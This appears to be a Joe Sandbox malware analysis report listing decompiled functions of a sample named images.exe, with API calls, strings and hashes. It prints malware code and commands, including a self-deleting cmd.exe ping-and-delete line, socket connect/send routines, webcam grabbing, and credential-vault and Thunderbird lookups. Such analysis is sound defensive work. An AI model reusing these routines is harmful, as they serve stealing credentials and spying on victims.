                                      0x0043887f
                                      0x00438884
                                      0x00000000
                                      0x00000000
                                      0x0043888a
                                      0x0043888f
                                      0x00000000
                                      0x00000000
                                      0x00438895
                                      0x0043889a
                                      0x00000000
                                      0x00000000
                                      0x004388a0
                                      0x004388a5
                                      0x00000000
                                      0x00000000
                                      0x004388ab
                                      0x004388b0
                                      0x00000000
                                      0x00000000
                                      0x004388b2
                                      0x004388b7
                                      0x004388ba
                                      0x004388bb
                                      0x004388be
                                      0x004388c0
                                      0x004388c2
                                      0x004388c5
                                      0x004388c8
                                      0x004388ca
                                      0x004388ee
                                      0x004388f1
                                      0x00000000
                                      0x004388f5
                                      0x004388cf
                                      0x004388cf
                                      0x004388d1
                                      0x004388d4
                                      0x004388d6
                                      0x004388d9
                                      0x004388d9
                                      0x004388db
                                      0x00000000
                                      0x00000000
                                      0x004388dd
                                      0x004388de
                                      0x004388e1
                                      0x004388e2
                                      0x004388e4
                                      0x004388e6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004388e6
                                      0x004388e8
                                      0x004388eb
                                      0x00000000
                                      0x00438931
                                      0x00438931
                                      0x00438932
                                      0x00438932
                                      0x00000000
                                      0x0043893b
                                      0x004387b5
                                      0x00000000

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004387A8
                                      • GetLastError.KERNEL32 ref: 004387B5
                                      • CloseHandle.KERNEL32(00000000), ref: 004387BC
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004387C9
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004387F9
                                      • CloseHandle.KERNEL32(00000000), ref: 00438800
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateErrorLastReadSize
                                      • String ID: C:\ProgramData\images.exe$Password$Password
                                      • API String ID: 1366138817-953739094
                                      • Opcode ID: cbfc450604d6d786c809085f07dab544e447a438ca923115f256b86b5c013bd3
                                      • Instruction ID: 2216169cff0355ab1a3aae9a18d441cff0bd6bfcc24076f45493d414e9791ca5
                                      • Opcode Fuzzy Hash: cbfc450604d6d786c809085f07dab544e447a438ca923115f256b86b5c013bd3
                                      • Instruction Fuzzy Hash: A38125B0D042446EEF20EBA5C891BBEBB65AF19318F50506FF042572A2CBBD4D46C759
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043D7A9, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130comUNIQUE
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0043D7C0
                                      • CoInitialize.OLE32(00000000), ref: 0043D7C7
                                      • CoCreateInstance.OLE32(00442460,00000000,00000017,00444330,?), ref: 0043D7E5
                                      • VariantInit.OLEAUT32(?), ref: 0043D869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Initialize$CreateInitInstanceSecurityVariant
                                      • String ID: I+C$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                      • API String ID: 2382742315-751697490
                                      • Opcode ID: 2f78ab773517b02c65b44bc9c880b6d0fd79923aaad6743984c8994fff237778
                                      • Instruction ID: 17e6a66b553c7ed42e54899f5c330e6219d0f592a15652b472809ac324868797
                                      • Opcode Fuzzy Hash: 2f78ab773517b02c65b44bc9c880b6d0fd79923aaad6743984c8994fff237778
                                      • Instruction Fuzzy Hash: 6A41F970A00209ABDB14DF95CC48EAFBBB8FFCAB15F104499F515EB290DB74A905CB64
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC7699, Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00CC76AF
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC76BB
                                      • _free.LIBCMT ref: 00CC76C6
                                      • _free.LIBCMT ref: 00CC76D1
                                      • _free.LIBCMT ref: 00CC76DC
                                      • _free.LIBCMT ref: 00CC76E7
                                      • _free.LIBCMT ref: 00CC76F2
                                      • _free.LIBCMT ref: 00CC76FD
                                      • _free.LIBCMT ref: 00CC7708
                                      • _free.LIBCMT ref: 00CC7716
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 0cb41f9d21b498956cda43d494d1636b2a13cc2743eb420c67f53474d54964e2
                                      • Instruction ID: c4d693b1badcb637dcac61f4976d6e3572a229f9a1187e2e8ea7521fd25c95cc
                                      • Opcode Fuzzy Hash: 0cb41f9d21b498956cda43d494d1636b2a13cc2743eb420c67f53474d54964e2
                                      • Instruction Fuzzy Hash: 29218576900208AFCB41EF94C991EDE7BB9EF0C354B0081AAF5199B221DB31EA559F80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043D0F5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0043D344: WSAStartup.WS2_32(00000202,?), ref: 0043D361
                                        • Part of subcall function 0043D344: socket.WS2_32(00000002,00000001,00000000), ref: 0043D372
                                        • Part of subcall function 0043D344: gethostbyname.WS2_32(?), ref: 0043D380
                                        • Part of subcall function 0043D344: htons.WS2_32(?), ref: 0043D3A6
                                        • Part of subcall function 0043D344: connect.WS2_32(00000000,?,00000010), ref: 0043D3B9
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0043D137
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0043D14C
                                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 0043D15F
                                      • htons.WS2_32(?), ref: 0043D16D
                                      • recv.WS2_32(00000000,?,00000004,00000000), ref: 0043D183
                                      • wsprintfA.USER32 ref: 0043D1D2
                                      • recv.WS2_32(00000000,?,000000FF,00000000), ref: 0043D1EA
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,?,00000001,00000000), ref: 0043D27B
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0043D290
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0043D2A5
                                        • Part of subcall function 0043D2BD: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0043D2DA
                                        • Part of subcall function 0043D2BD: recv.WS2_32(00000000,?,00000800,00000000), ref: 0043D30E
                                        • Part of subcall function 0043D2BD: send.WS2_32(00000000,?,00000000,00000000), ref: 0043D327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
                                      • String ID: %u.%u.%u.%u
                                      • API String ID: 735718650-1542503432
                                      • Opcode ID: a66bd09cd45f0030507bd1f3e7755f9bceb9c9618648205497e9319b56de8da4
                                      • Instruction ID: aecc144625a0f33f690da54a8ef49ef0a35b00de87b525841307d1c00e484def
                                      • Opcode Fuzzy Hash: a66bd09cd45f0030507bd1f3e7755f9bceb9c9618648205497e9319b56de8da4
                                      • Instruction Fuzzy Hash: 1941333160430667D715A669AC84FBFB2DEAFC8304F00146BF994D61D1E668C90AC79E
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00432803, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108processthreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E00432803() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t63;
				void* _t70;
				void* _t73;

				_t63 = _t70;
				_t73 = _t63;
				E0043EECF(_t73 + 0x10);
				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
					TerminateThread( *0x44679c, 0);
				}
				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
					E0043EFFE(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
					E0043345A( &_v8, _t73 + 0x54);
					E0043EEEA(_t73 + 4,  &_v8);
					E00435A2D(_v8);
					E0043EF4C(_t73 + 4);
				}
				E00431052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0043102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0043102C( &_v817, "\"", 1);
				E0043102C( &_v816,  &_v352, E004310D5( &_v352));
				E0043102C(E004310D5( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}













                                      0x00432803
                                      0x0043f52f
                                      0x0043f534
                                      0x0043f53e
                                      0x0043f547
                                      0x0043f547
                                      0x0043f550
                                      0x0043f564
                                      0x0043f570
                                      0x0043f57b
                                      0x0043f583
                                      0x0043f58a
                                      0x0043f58a
                                      0x0043f596
                                      0x0043f5a0
                                      0x0043f5a4
                                      0x0043f5aa
                                      0x0043f5ab
                                      0x0043f5b4
                                      0x0043f5c8
                                      0x0043f5dc
                                      0x0043f5fc
                                      0x0043f61c
                                      0x0043f63e
                                      0x0043f64d
                                      0x0043f652
                                      0x0043f655

                                      APIs
                                        • Part of subcall function 0043EECF: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0043EED6
                                      • TerminateThread.KERNEL32(00000000,?,?), ref: 0043F547
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0043F5B4
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043F63E
                                      • CloseHandle.KERNEL32(?), ref: 0043F64D
                                      • CloseHandle.KERNEL32(?), ref: 0043F652
                                      • ExitProcess.KERNEL32 ref: 0043F655
                                      Strings
                                      • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0043F5C2
                                      • |FD, xrefs: 0043F5CF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                      • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q $|FD
                                      • API String ID: 3630425516-2779118983
                                      • Opcode ID: b766fda1ebfaac2a9a06ebbb19aa73bc4684d4d03ca135058cd9d62edbb8d175
                                      • Instruction ID: e8f3c25833ee886699086a2e719cb312b512d0d768c31e5bdeaed5d91f71bcec
                                      • Opcode Fuzzy Hash: b766fda1ebfaac2a9a06ebbb19aa73bc4684d4d03ca135058cd9d62edbb8d175
                                      • Instruction Fuzzy Hash: BD3174B2900618BFDB15EBE1CD86EEF777DEB08304F401466B605A2151DB78AF48CBA5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043FCD9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0043FCD9() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0043FE7E(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0043102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E00431052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E0043FD9E(_t24);
						}
					}
				}
				return _t10;
			}










                                      0x0043fce8
                                      0x0043fceb
                                      0x0043fcf2
                                      0x0043fcfa
                                      0x0043fd03
                                      0x0043fd89
                                      0x0043fd8e
                                      0x0043fd90
                                      0x0043fd92
                                      0x00000000
                                      0x0043fd92
                                      0x0043fd09
                                      0x0043fd1c
                                      0x0043fd24
                                      0x0043fd3b
                                      0x0043fd4a
                                      0x0043fd54
                                      0x0043fd58
                                      0x0043fd59
                                      0x0043fd5a
                                      0x0043fd6f
                                      0x0043fd77
                                      0x0043fd7e
                                      0x0043fd84
                                      0x0043fd94
                                      0x00000000
                                      0x0043fd94
                                      0x0043fd77
                                      0x0043fd03
                                      0x0043fd9d

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00441382,?,?,00000000), ref: 0043FCEB
                                      • IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0043FCF2
                                      • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0043FD16
                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0043FD24
                                      • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0043FD32
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043FD6F
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0043FD7E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 3151064845-2003734499
                                      • Opcode ID: 3517932b25427f577c54faa0c07de24b56f954c5ea8c14622f7d7c1f47060c2d
                                      • Instruction ID: 71593c5467e28dd15412ec48e9278d96172e44a20ad05dcd00c49c3e56c1c65b
                                      • Opcode Fuzzy Hash: 3517932b25427f577c54faa0c07de24b56f954c5ea8c14622f7d7c1f47060c2d
                                      • Instruction Fuzzy Hash: BA1196B5A00308BFE7109BF5DD89FAF766CDB09744F000436B706E6190DAB89E088679
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043ADBE, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043ADBE(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E00431052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}









                                      0x0043add2
                                      0x0043addc
                                      0x0043ade2
                                      0x0043ade4
                                      0x0043ade6
                                      0x0043adfa
                                      0x0043ae08
                                      0x0043ae29
                                      0x00000000
                                      0x0043ae51
                                      0x0043ae3e
                                      0x0043ae47
                                      0x00000000

                                      APIs
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                      • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                      • RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                      • RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      Strings
                                      • Path, xrefs: 0043AE36
                                      • thunderbird.exe, xrefs: 0043AE00
                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0043ADF4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                      • API String ID: 3135247354-1374996286
                                      • Opcode ID: 192725afc994be4b017beb16ddfb8f32ae7e2eb824d3615e7476867fce128a98
                                      • Instruction ID: 5a798d5954ffe8799e54ed20458ec2c87cadc8b9d356511062dd964af6ee600c
                                      • Opcode Fuzzy Hash: 192725afc994be4b017beb16ddfb8f32ae7e2eb824d3615e7476867fce128a98
                                      • Instruction Fuzzy Hash: B811307694010DBFE7109F94DE49FEA77BCEB15705F500076B609E2150E6B49E04CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00440500, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 175comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00440500(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x442560, 0, 1, 0x444854,  &_v24);
				_t91 = _v24;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t95 = _v24;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x442540,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E00440831(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x4425b0, 0, 1, 0x444844,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E00431052( &_v144, 0, 0x48);
					_t80 = _v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0044044E();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0044046A();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t82 = _v24;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0043102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E004402B1( &_v216);
								_t63 = E004408F0(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}































                                      0x0044050e
                                      0x00440512
                                      0x0044051b
                                      0x00440527
                                      0x0044052a
                                      0x0044052c
                                      0x0044052f
                                      0x00440531
                                      0x00440534
                                      0x0044053f
                                      0x00440541
                                      0x00440546
                                      0x00440670
                                      0x00440670
                                      0x00440675
                                      0x0044067a
                                      0x0044067d
                                      0x0044067d
                                      0x00440681
                                      0x00440681
                                      0x00440686
                                      0x0044068b
                                      0x0044068e
                                      0x0044068e
                                      0x00440692
                                      0x00440697
                                      0x0044069c
                                      0x0044069f
                                      0x0044069f
                                      0x004406a3
                                      0x004406a8
                                      0x004406ad
                                      0x004406b0
                                      0x004406b0
                                      0x004406b6
                                      0x004406bb
                                      0x004406bb
                                      0x004406c0
                                      0x004406c5
                                      0x004406c5
                                      0x004406c8
                                      0x004406d2
                                      0x004406d2
                                      0x00440558
                                      0x0044055a
                                      0x0044055f
                                      0x00000000
                                      0x00000000
                                      0x00440568
                                      0x00440571
                                      0x00440579
                                      0x00000000
                                      0x00000000
                                      0x00440590
                                      0x00440592
                                      0x00440597
                                      0x004405a8
                                      0x004405ab
                                      0x004405b9
                                      0x004405c6
                                      0x004405d0
                                      0x004405e2
                                      0x004405e5
                                      0x004405e6
                                      0x004405e7
                                      0x004405f0
                                      0x004405f1
                                      0x004405f2
                                      0x004405f3
                                      0x004405f6
                                      0x004405fc
                                      0x00440601
                                      0x00440605
                                      0x0044060a
                                      0x0044060f
                                      0x00440613
                                      0x00440615
                                      0x0044061d
                                      0x00440622
                                      0x00440624
                                      0x00440631
                                      0x00440634
                                      0x0044063c
                                      0x00440649
                                      0x00440657
                                      0x0044066b
                                      0x0044066b
                                      0x00440622
                                      0x00440613
                                      0x00440605
                                      0x00000000

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00440512
                                      • CoCreateInstance.OLE32(00442560,00000000,00000001,00444854,00440041), ref: 0044053F
                                      • CoUninitialize.OLE32 ref: 004406C8
                                        • Part of subcall function 00440831: CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 0044085F
                                      • CoCreateInstance.OLE32(004425B0,00000000,00000001,00444844,?), ref: 00440590
                                        • Part of subcall function 004402B1: CoTaskMemFree.OLE32(?), ref: 004402BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 533512943-4200688928
                                      • Opcode ID: 55870100d3fff4eba4b338b24ae90e04cbb8094ee716ade290d21c1e7b197326
                                      • Instruction ID: 463e9ebc5deb1b705b0bd527fae181403ea15e9dc447d55f693ad86090787971
                                      • Opcode Fuzzy Hash: 55870100d3fff4eba4b338b24ae90e04cbb8094ee716ade290d21c1e7b197326
                                      • Instruction Fuzzy Hash: D3516E71A00209AFEB14DFA5C894FAFB7B9BF84705F15406EF605AB260CBB59D10CB64
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043A1FF, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0043A1FF(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
